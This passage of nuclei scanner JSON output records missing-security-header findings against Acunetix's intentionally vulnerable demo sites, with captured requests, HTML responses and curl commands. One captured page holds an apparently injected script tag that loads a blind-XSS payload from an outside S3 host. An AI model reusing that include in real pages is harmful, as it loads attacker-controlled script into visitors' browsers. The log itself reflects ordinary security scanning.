\\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:02.133215869Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:02.271643017Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" 